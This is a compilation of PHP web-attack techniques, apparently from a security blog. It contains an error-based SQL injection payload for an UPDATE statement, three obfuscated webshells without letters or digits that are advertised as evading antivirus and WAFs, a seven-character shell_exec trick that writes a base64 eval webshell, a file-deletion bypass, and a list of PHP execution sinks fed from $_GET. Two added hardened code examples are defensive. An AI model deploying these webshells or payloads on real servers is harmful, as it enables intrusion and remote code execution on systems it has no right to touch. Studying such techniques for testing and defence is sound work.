SQL injection (LEFT JOIN)
Source
<?php
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');
// Only addslashes() is applied: quotes and backslashes are escaped, but backticks
// are not, and the value is used as an identifier, not as a quoted string.
$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}`
SET `username`='admin'
WHERE id=1";
if(!mysqli_query($link, $sql)) {
    echo(mysqli_error($link)); // database error text is echoed back to the client
}
mysqli_close($link);
SQL statement after injection
UPDATE `table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username
SET username='admin'
WHERE id=1;
Injection approach
- The source filters user input with addslashes, so single quotes, double quotes and backslashes are escaped.
- The whole SQL statement is not written on a single line, so an ordinary single-line comment cannot be used to comment out the rest of it. An UPDATE also differs from a SELECT: a SELECT is more flexible, it can be freely combined with UNION, and stacked statements separated by semicolons can be executed, whereas an UPDATE can be combined with LEFT JOIN for a joined query.
- The source code shows that SQL error messages are echoed back, so error-based injection is possible.
- Use char() encoding so that no quotes are needed.
- Use LEFT JOIN for the joined query.
- Use error-based injection.
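The hardened counterpart of the source above, added here as an example (it is not code from the original page). The allowed table names are assumed; the point is that an identifier cannot be escaped with addslashes() or bound as a prepared-statement parameter, so it must be validated against an allowlist, and database errors must not be echoed to the client.

```php
<?php
// Added example, not from the original page: table allowlist + prepared statement.
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');
mysqli_report(MYSQLI_REPORT_OFF); // handle errors ourselves, never print them

// Only the tables this endpoint is meant to update (names are assumed).
$allowedTables = ['users', 'staff'];
$table = $_GET['table'] ?? '';
if (!is_string($table) || !in_array($table, $allowedTables, true)) {
    http_response_code(400);
    exit('unknown table');
}
// The allowlist already excludes backticks; escaping them is defence in depth.
$ident = '`' . str_replace('`', '``', $table) . '`';

// The identifier is now fixed text; the values go through a prepared statement.
$stmt = mysqli_prepare($link, "UPDATE {$ident} SET `username` = ? WHERE id = ?");
if ($stmt === false) {
    error_log('prepare failed: ' . mysqli_error($link));
    http_response_code(500);
    exit('update failed');
}
$username = 'admin';
$id = 1;
mysqli_stmt_bind_param($stmt, 'si', $username, $id);
if (!mysqli_stmt_execute($stmt)) {
    // Log the real error server-side. Echoing mysqli_error() to the client is
    // exactly what the extractvalue() error-based payload above relies on.
    error_log('update failed: ' . mysqli_stmt_error($stmt));
    http_response_code(500);
    exit('update failed');
}
mysqli_stmt_close($stmt);
mysqli_close($link);
```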
Webshell without letters or digits
Reprinted from: PHITHON
Evades AV and WAF, and AntSword can connect to it directly
Source
<?php
// Rejects input containing any letter or digit (the i flag makes the check
// case-insensitive), then evaluates whatever remains.
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
    eval($_GET['shell']);
}
?>
Approach
Non-alphanumeric characters are transformed in various ways to construct any desired character; the final step relies on PHP's variable function feature, where a string holding a function name can be called as a function.
PHP 5 and PHP 7 differ here. In PHP 5, assert can be called through a variable function name to execute arbitrary code: $f='assert';$f(...);. In PHP 7, assert is a language construct rather than a function, so it cannot be called through a variable function name; other functions such as file_put_contents can be used to get a shell instead.
PS: file_put_contents(filename, content, 8) writes to the file in append mode (8 is the value of FILE_APPEND).
Method One
XORing two non-alphanumeric characters yields a chosen character; in this way every letter and digit can be obtained.
<?php
$_='assert'; //$_='assert'
$__='_'.'POST'; //$__='_'.'POST'
$___=$$__; //$___=$_POST
$_($___[_]); //assert($_POST[_])
?>
Each letter is obtained by XORing two non-alphanumeric characters, and the results are then concatenated.
Method Two
Take one byte out of the UTF-8 encoding of certain characters and apply the bitwise NOT operator to it. For example, '和'{2} selects the byte at offset 2 of the Chinese character '和', which is \x8c, and its bitwise negation is the letter s. In this way any letter can be obtained; the digit 2 can be obtained as ('>'>'<')+('>'>'<').
<?php
// $__ = 2 and $_ = 1; negating one UTF-8 byte of each character spells 'assert'
// into $____ and '_POST' into $_____. The {} string-offset syntax used below was
// removed in PHP 8.0, so this form only works on PHP 7.x and earlier.
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
?>
Method Three
PHP has several features:
- Forcing an array to a string converts it to the string Array
- 'a'++ gives b
- 2 equals ('>'>'<')+('>'>'<')
<?php
$_=[]; // define $_ as an array
$_=@"$_"; // the @ suppresses the array-to-string notice; the cast yields $_='Array'
$_=$_['!'=='@']; // '!'=='@' is false, i.e. index 0: $_=$_[0], the letter A
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
?>
Characteristics of PHP file manipulation functions
Source: http://www.am0s.com/functions/386.html
file_put_contents
The first parameter is the file name; the second parameter can be an array, for example:
http://127.0.0.1/shell.php?param[0]=<&param[1]=?php phpinfo();
Normally param would be a single string parameter, but because the back end is PHP, which turns param[0]=...&param[1]=... into an array, and file_put_contents joins an array passed as its data argument, the array form above can be used.
Read/write functions such as file_put_contents, copy and file_get_contents differ from functions such as unlink and file_exists, which only check for or delete a file, in how they process paths. The read/write functions convert the path to an absolute path before operating on the file, whereas the functions that merely check whether a file exists do not normalize a relative path. The existence check and the write therefore do not agree on which file is meant, which lets the deletion be bypassed.
On Linux, ../test.php or test.php/. bypasses deletion; on Windows, test.php:test or test.ph< bypasses deletion.
Windows example (Windows does not allow \ / : * ? " < > | in file names, so the characters after them are dropped automatically):
http://127.0.0.1/l.php?user[name]=2.php:test&user[info]=2y generates 2.php
http://127.0.0.1/l.php?user[name]=2.ph<&user[info]=2y writes the content
Personally, I feel this may be of some use when temporary files are deleted; the environment is too complex, and the conditions are hard to meet in a real scenario.
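A write helper that closes both problems described above, added here as an example (not code from the original page). It refuses array-valued request parameters and validates the file name before any write, existence check or delete, so the traversal, trailing "/." and NTFS stream forms never reach the file system. The base directory, file-name rule and sample inputs are assumptions made for the demo.

```php
<?php
// Added example, not from the original page: reject array parameters and
// non-canonical file names before touching the file system.
function safe_write_text(string $baseDir, $name, $content): string
{
    // Request parameters must be scalar strings; PHP builds ?p[0]=a&p[1]=b into
    // an array, which file_put_contents would silently join and write.
    if (!is_string($name) || !is_string($content)) {
        throw new InvalidArgumentException('name and content must be strings');
    }
    // One plain file name with a fixed extension: no separators, colons or "..".
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $name)) {
        throw new InvalidArgumentException('invalid file name');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    // Build one canonical path and use it for every later check, write or
    // unlink, so an existence test and a write can never refer to different files.
    $target = $base . DIRECTORY_SEPARATOR . $name;
    if (file_put_contents($target, $content, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $target;
}

// Constructed inputs shaped like the $_GET values discussed above.
$cases = [
    ['note.txt', 'hello'],        // accepted
    [['a', 'b'], 'x'],            // array parameter: rejected
    ['../note.txt', 'x'],         // traversal: rejected
    ['note.txt/.', 'x'],          // trailing "/.": rejected
    ['note.txt:alt', 'x'],        // NTFS stream syntax: rejected
];
foreach ($cases as [$name, $content]) {
    try {
        echo 'wrote ', safe_write_text(sys_get_temp_dir(), $name, $content), "\n";
    } catch (Exception $e) {
        echo 'rejected ', json_encode($name), ': ', $e->getMessage(), "\n";
    }
}
```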
eval length limit bypass
Source
<?php
$param=$_REQUEST['param'];
// Length must be below 17, and the strings 'eval' and 'assert' are denied.
// Note the second strpos() is compared with == rather than ===, a loose comparison.
if(strlen($param)<17&&strpos($param,'eval')===false&& strpos($param,'assert')==false){
    eval($param);
}
?>
- The parameter may be at most 16 characters long
- The assert and eval functions cannot be used
Seven-character limit: arbitrary command execution
Source
<?php
// The only restriction is the length: anything shorter than 8 characters is
// passed straight to the shell and its output echoed.
if(strlen($_GET[1])<8){
    echo shell_exec($_GET[1]);
}
?>
Approach
First, the PHP logic shows that arbitrary commands can be executed; the only restriction is the length. The last resort is therefore redirection under Linux, and because of the length limit some gentler tricks are needed.
# w shows who is logged on under Linux
# > is redirection in Linux
# The command below redirects the output of w into a file named php, so a file named php appears in the current directory. Some characters such as > may interfere with command execution, so the shell string is written base64-encoded, which amounts to generating a one-liner shell in a disguised form
w > php
# The method above creates files with whatever names we want in the current directory; the file names are then concatenated into the complete shell string and written to a file
# This command sorts the files by time and writes all the file names, concatenated, into file 0
ls -t>0
# Finally run the shell script to generate the PHP shell file
sh 0
# The complete string after concatenating the file names is:
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d>c.php
Code execution functions
eval
Hazard: executes arbitrary PHP code
Parameter: string
Note: in PHP 5.x, a parse error in the evaluated code does not affect execution of the code that follows; in PHP 7.x, once the evaluated code has a parse error, the code after the eval call is not executed and a ParseError exception is thrown
assert
Hazard: the first argument, assertion, is executed as PHP code
Parameters: the required assertion is the string executed as code; the optional description is returned as part of the error message displayed when the assertion fails
preg_replace
Hazard: with the /e modifier, preg_replace executes the replacement parameter as PHP code
Parameters: pattern is the search pattern (string or array of strings); replacement is the replacement string or array of strings; subject is the string or array of strings to search and replace in; limit is the maximum number of replacements, -1 meaning unlimited; count receives the number of replacements performed
Principle: with the /e modifier, after performing the replacement, preg_replace passes the resulting string to eval, which is how PHP code execution is achieved
Note: from PHP 5.5.0 the /e modifier produces an E_DEPRECATED error; from PHP 7.0.0 /e produces an E_WARNING error
create_function
Hazard: command execution
Usage:
The first parameter is the argument list and the second is the function body, which is compiled as PHP code
$newFunc=create_function('$v','return system($v);');
$newFunc('whoami');
call_user_func
Function: command execution
Usage: the first parameter is a callback; the remaining parameters are passed to the callback
call_user_func(system,$_GET[cmd]);
call_user_func_array
Function: command execution, similar to call_user_func
Usage:
The first parameter is the callback; the second is an array of parameters for the callback
call_user_func_array(file_put_contents,['filename','木马字符串'])
call_user_func_array(system,[$_GET['cmd']])
File inclusion
There are two kinds of file inclusion: local file inclusion and remote file inclusion. Both can directly get a shell, and wrappers such as php://filter can also be used to read local files
include($_GET['file']);
?file=php://filter/convert.base64-encode/resource=index.php
Explanation: ?file=php://wrapper/filter/file
include
require
include_once
require_once
Command Execution Functions
exec
Function: executes an external program
Usage: echo exec($_GET[cmd]);
passthru
Function: executes an external program and displays the raw output
Usage: passthru($_GET[cmd]);
proc_open
Function: executes a command and opens file pointers for its input/output
Usage: https://php.net/manual/zh/function.proc-open.php
shell_exec
Function: runs the command through the shell and returns the complete output as a string
Usage: echo shell_exec($_GET[cmd]);
system
Function: executes an external program and displays the output
Usage: system($_GET[cmd]);
popen
Function: opens a pipe to the command passed as its parameter and executes it
Usage: https://php.net/manual/zh/function.popen.php